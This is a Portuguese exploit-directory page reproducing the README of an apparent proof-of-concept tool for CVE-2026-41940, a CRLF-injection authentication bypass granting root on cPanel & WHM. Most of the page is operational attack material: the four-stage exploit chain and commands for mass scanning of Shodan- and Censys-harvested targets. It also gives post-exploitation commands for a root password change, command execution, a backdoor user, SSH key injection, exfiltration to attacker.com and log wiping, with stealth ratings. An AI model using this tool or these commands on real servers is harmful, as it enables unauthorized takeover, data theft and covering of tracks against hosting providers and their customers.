Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41940-Exploit-PoC — Exploit PoC para CVE-2026-41940, uma bypass de autenticação no cPanel & WHM via injeção CRLF. Inclui varredura em massa, ações pós-exploração e um shell interativo para testes autorizados. | Kitploit
Ferramentas/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
Autenticação e AutorizaçãoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

Exploit PoC para CVE-2026-41940, uma bypass de autenticação no cPanel & WHM via injeção CRLF. Inclui varredura em massa, ações pós-exploração e um shell interativo para testes autorizados.

Ver RepositórioSite
2114há 4 mesesAinda não revisado

CVE-2026-41940 Exploit PoC – Bypass de Autenticação cPanel & WHM

CVE-2026-41940 CVSS Go Version License

Ferramenta por: Ishan Oshada | GitHub

⚠️ APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS. Uso não autorizado é ilegal.

1


📋 Índice

  • Visão Geral da Vulnerabilidade
  • Cadeia de Exploração
  • Recursos
  • Instalação
  • Início Rápido
  • Exemplos de Uso (Tabela)
  • Ações Pós-Exploração
  • Comandos do Shell Interativo
  • Varredura em Massa com urls.txt
  • Exemplos de Saída
  • Referência de Opções
  • Versões Afetadas
  • Compilação para Todas as Plataformas
  • FAQ e Solução de Problemas
  • Aviso Legal
  • Autor

2

Visão Geral da Vulnerabilidade

CVE-2026-41940 é uma vulnerabilidade de injeção CRLF no cPanel & WHM (versões < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).

A função saveSession() grava os dados da sessão após aplicar filter_sessiondata(), mas o filtro é aplicado tarde demais. Ao injetar caracteres CRLF (\r\n) dentro do cabeçalho Authorization: Basic, um atacante pode envenenar o arquivo de sessão em disco com pares chave-valor arbitrários (por exemplo, hasroot=1, tfa_verified=1, user=root).

Quando a sessão envenenada é posteriormente carregada, o cPanel/WHM concede acesso total de root sem qualquer senha.

Pontuação CVSS: 10.0 (CRÍTICA)

  • Vetor de Ataque: Rede
  • Complexidade do Ataque: Baixa
  • Privilégios Necessários: Nenhum
  • Interação do Usuário: Nenhuma
  • Confidencialidade: Alta
  • Integridade: Alta
  • Disponibilidade: Alta

Cadeia de Exploração (4 Estágios)


Recursos

  • ✅ Varredura única e em massa (entrada de arquivo, pipe stdin)
  • ✅ Varredura com threads (controle de concorrência até 100+ threads)
  • ✅ Modo verboso (--verbose) – mostra requisições/respostas HTTP completas
  • ✅ Saída JSON (salva automaticamente quando um alvo vulnerável é encontrado)
  • ✅ 10 ações pós-exploração (veja a tabela abaixo)
  • ✅ Multiplataforma (Windows, Linux, macOS)
  • ✅ Sem dependências externas (apenas biblioteca padrão do Go)
  • ✅ Saída colorida no terminal com resultados em caixas claras
  • ✅ Persistência de sessão – mecanismo de keep-alive
  • ✅ Shell WHM interativo com histórico de comandos

Instalação

Pré-requisitos

  • Go 1.20 ou superior (Download)

Clonar Repositório

root@kitploit:~
git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

Compilar Executável

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go

Linux / macOS

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

Executar Diretamente (Sem Compilar)

root@kitploit:~
go run main.go -u https://target.com:2087

Binários Pré-compilados (Forma Mais Rápida)

Em vez de compilar a partir do código-fonte, você pode baixar os executáveis estáveis mais recentes diretamente do repositório. Eles são gerados automaticamente a cada atualização:

Nota: Se estiver usando Linux ou macOS, lembre-se de conceder permissões de execução após o download:


Início Rápido

root@kitploit:~
# Varredura básica
go run main.go -u https://target.com:2087

# Listar todas as contas cPanel
go run main.go -u https://target.com:2087 -action list

# Shell WHM interativo
go run main.go -u https://target.com:2087 -action shell

# Varredura em massa com urls.txt
go run main.go -l urls.txt -t 20 -o results.json

Exemplos de Uso (Tabela)


Ações Pós-Exploração


Comandos do Shell Interativo

Uma vez dentro do shell (-action shell), use estes comandos:


Varredura em Massa com urls.txt

O repositório inclui urls.txt com 1000 alvos de exemplo para varredura em massa.

Formato do urls.txt

root@kitploit:~
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...

Comandos de Varredura em Massa

root@kitploit:~
# Varredura em massa básica (10 threads)
go run main.go -l urls.txt

# Varredura em massa rápida (50 threads, salvar resultados)
go run main.go -l urls.txt -t 50 -o results.json

# Varredura em massa com ação pós-exploração
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json

# Varredura em massa com saída verbosa
go run main.go -l urls.txt -t 10 --verbose

# Varredura em massa com timeout aumentado (redes lentas)
go run main.go -l urls.txt -t 30 -timeout 30

Gerar urls.txt Você Mesmo

root@kitploit:~
# Gerar faixa de IP (Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt

# Gerar faixa de IP (Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt

# A partir do Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt

# A partir do Censys
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt

Exemplos de Saída

Alvo Vulnerável Encontrado

root@kitploit:~
╔════════════════════════════════════════════════════════════════╗
║                    ALVO VULNERÁVEL DETECTADO                   ║
╠════════════════════════════════════════════════════════════════╣
║ Alvo: https://target.example.com:2087                          ║
║ Token: /cpsess1234567890                                       ║
║ Versão: 11.76.0.22                                             ║
║ Sessão: :od2aMhg5zJeQunUy...                                   ║
║ URL da API: https://target.example.com:2087/cpsess1234567890/json-api/version ║
╚════════════════════════════════════════════════════════════════╝

[+] Ação: LIST
    • Usuário: admin | Domínio: example.com
    • Usuário: backup | Domínio: backup.example.com
    • Usuário: client1 | Domínio: client1.com

Resumo da Saída

root@kitploit:~
════════════════════════════════════════════════════════════════════
                    RESUMO DA VARREDURA CONCLUÍDA
════════════════════════════════════════════════════════════════════
  Total de Alvos Varridos: 1000
  Alvos Vulneráveis: 47
  Tempo Decorrido: 125.34 segundos

ALVOS VULNERÁVEIS:
────────────────────────────────────────────────────────────────
  1. https://192.168.1.15:2087
      Token: /cpsess1111111111
      Versão: 11.76.0.22
      Sessão: :od2aMhg5zJeQunUy...
  2. https://192.168.1.42:2087
      Token: /cpsess2222222222
      Versão: 11.86.0.15
      Sessão: Km2psnYR9w3rRkLU...
  3. https://example.com:2087
      Token: /cpsess3333333333
      Versão: 11.118.0.42
      Sessão: Xk9mQrNtPw3sVbLm...

════════════════════════════════════════════════════════════════════

[✓] Resultados salvos em: results.json

Referência de Opções


Versões Afetadas


Compilação para Todas as Plataformas

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087

Linux

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087

macOS (Intel)

root@kitploit:~
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

macOS (Apple Silicon M1/M2/M3)

root@kitploit:~
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

Compilação Cruzada para Todas as Plataformas

root@kitploit:~
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go

# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go

# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go

Estrutura de Diretórios

root@kitploit:~
CVE-2026-41940-Exploit-PoC/
├── README.md           # Documentação
├── bin/                # Executáveis pré-compilados multiplataforma 
│   ├── windows_x64/
│   ├── linux_x64/
│   └── ...
├── main.go             # Código-fonte principal
├── urls.txt            # 1000 alvos de exemplo
├── go.mod              # Arquivo de módulo Go
├── .gitignore          # Arquivo de ignorados do Git
└── results.json        # Arquivo de saída (gerado)

Aviso Legal

Esta ferramenta é para fins educacionais e testes de penetração autorizados apenas.

O acesso não autorizado a sistemas de computador é ilegal sob:

  • Computer Fraud and Abuse Act (CFAA) - EUA
  • Computer Misuse Act - Reino Unido
  • Information Technology Act - Índia
  • Leis semelhantes em todo o mundo

O autor não assume nenhuma responsabilidade por uso indevido. Use por sua conta e risco.

Ao usar esta ferramenta, você concorda que possui autorização adequada para testar os sistemas alvo.


Autor

Ishan Oshada

  • 🔗 Site: ishanoshada.com
  • 🐙 GitHub: github.com/ishanoshada
  • 📧 E-mail: [email protected]

Views

Suporte

Se você achar esta ferramenta útil:

  • ⭐ Dê uma estrela no repositório do GitHub
  • 🔄 Compartilhe com a comunidade de segurança
  • 📝 Reporte problemas via GitHub Issues

Feliz Hacking! 🚀

Lembre-se: Com grandes poderes vêm grandes responsabilidades. Use eticamente.

Baixar ferramenta
EstágioAçãoDescrição
1POST /login/?login_only=1Solicitar cookie de sessão pré-autenticação com credenciais incorretas
2GET / + cabeçalho Authorization com CRLFEnvenenar o arquivo de sessão com hasroot=1, user=root, etc.
3GET /scripts2/listacctsForçar o cache de sessão a recarregar o arquivo envenenado (propagação)
4GET /cpsess<TOKEN>/json-api/versionVerificar acesso root – sucesso = 200 + dados da versão
PlataformaLocalização
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper
#FinalidadeComando
1Varredura básica de alvo únicogo run main.go -u https://target.com:2087
2Listar todas as contas cPanelgo run main.go -u https://target.com:2087 -action list
3Alterar senha de rootgo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4Executar comando do sistemago run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5Obter informações do servidorgo run main.go -u https://target.com:2087 -action info
6Criar usuário backdoorgo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7Criar token de API (furtivo)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8Injetar chave SSHgo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9Despejar e exfiltrar contago run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10Apagar logs e cobrir rastrosgo run main.go -u https://target.com:2087 -action wipe
11Shell WHM interativogo run main.go -u https://target.com:2087 -action shell
12Varredura em massa a partir de arquivogo run main.go -l urls.txt -t 20 -o results.json
13Salvar resultados em JSONgo run main.go -u https://target.com:2087 -o scan_results.json
14Ativar depuração verbosago run main.go -u https://target.com:2087 --verbose
15Pipe de outras ferramentascat urls.txt | go run main.go -t 20
16Aumentar timeoutgo run main.go -u https://target.com:2087 -timeout 30
AçãoFlagDescriçãoNível de Furtividade
list-action listListar todas as contas cPanelBaixo
passwd-action passwd -passwd NEWPASSAlterar senha de root (ruidosa)Alto (detectável)
cmd-action cmd -cmd "id"Executar comandos do SOMédio
info-action infoMostrar hostname, carga, versãoBaixo
adduser-action adduser -new-user U -new-domain DCriar usuário cPanel backdoorMédio
apitoken-action apitoken [-tokenname NAME]Gerar token de API persistenteMuito Baixo
sshkey-action sshkey -sshkey "ssh-rsa..."Injetar chave pública SSH no rootMuito Baixo
dumpacct-action dumpacct -dumpuser USER -exfil URLFazer backup e exfiltrar contaMédio
wipe-action wipeDesativar WAF, limpar logs, apagar históricoCobrir rastros
shell-action shellShell WHM interativoBaixo
ComandoDescriçãoExemplo
accountsListar todas as contas cPanelaccounts
passwd <senha>Alterar senha de rootpasswd MyNewPass123!2006
exec <comando>Executar comando do sistemaexec "cat /etc/passwd"
infoMostrar informações do servidorinfo
versionMostrar versão do cPanelversion
helpMostrar comandos disponíveishelp
exitSair do shellexit
OpçãoTipoPadrãoDescrição
-ustring-URL do alvo (ex.: https://example.com:2087)
-lstring-Arquivo com alvos (um por linha)
-tint10Número de threads concorrentes
-actionstring-Ação pós-exploração
-passwdstring-Nova senha (para passwd/adduser)
-cmdstring-Comando a executar (para ação cmd)
-new-userstring-Nome de usuário para ação adduser
-new-domainstring-Domínio para ação adduser
-tokennamestring-Nome para token de API (ação apitoken)
-sshkeystring-Chave pública SSH a injetar (ação sshkey)
-dumpuserstring-Nome de usuário para backup (ação dumpacct)
-exfilstring-URL remota para exfiltração (ação dumpacct)
-ostring-Arquivo JSON de saída (salva automaticamente quando encontrado)
--verboseboolfalseMostrar requisições/respostas HTTP
-hboolfalseMostrar menu de ajuda
RamoVersão CorrigidaVulnerável <
11.11011.110.0.9711.110.0.96
11.11811.118.0.6311.118.0.62
11.12611.126.0.5411.126.0.53
11.13211.132.0.2911.132.0.28
11.13411.134.0.2011.134.0.19
11.13611.136.0.511.136.0.4